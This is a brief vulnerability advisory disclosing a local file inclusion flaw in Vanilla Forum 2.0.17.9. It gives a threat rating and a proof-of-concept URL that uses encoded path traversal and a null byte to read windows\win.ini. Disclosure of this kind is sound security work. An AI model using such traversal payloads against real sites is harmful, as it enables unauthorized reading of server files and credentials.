Vulnerability Advisory

Software Vulnerability
Vanilla Forum 2.0.17.9 Local File Inclusion
Threat Tested On Date
4/5
Windows Vista + XAMPP 5/14/2011
Description
A vulnerability in Vanilla Forum 2.0.17.9 can be exploited to include arbitrary files.
Proof of Concept
http://localhost/vanilla/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00